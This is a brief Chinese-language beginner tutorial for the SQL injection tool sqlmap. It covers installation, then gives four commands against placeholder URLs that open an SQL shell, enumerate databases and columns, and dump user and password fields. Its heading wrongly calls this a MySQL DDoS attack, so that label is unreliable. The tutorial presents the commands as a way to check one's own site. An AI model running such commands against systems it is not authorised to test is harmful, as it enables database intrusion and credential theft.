sqlmap简单入门攻略
sqlmap依托于python,首先下载python 和 sqlmap
下载地址
python 安装一步步默认即可,安装完后将sqlmap 放入python根目录下
这还没结束,然后桌面新建快捷方式
然后找到新建的快捷方式,右键属性修改起始位置为你的sqlmap的地址
之后就可已正常使用sqlmap了
SQLMAP用于mysql中DDOS攻击
1.sqlmap.py -u [url]http://192.168.159.1/news.php?id=1[/url] --sql-shell (URL内容用引号引起来最好[url][/url]替代为引号)
2.查找数据库msyql
sqlmap.py -u “http://www.xxx.com/link.php?id=321” --dbs
3.通过2中的表得出列名(假如表为table_name)
sqlmap.py -u “http://www.xxx.com/link.php?id=321” -D dataname -T table_name --columns
4.获取字段的值(假如扫描出id,user,password字段)
sqlmap.py -u “http://www.xxx.com/link.php?id=321” -D dataname -T table_name -C “id,user,password” --dump
几个常用的检测自己网站漏洞用的,更多用途请百度一下。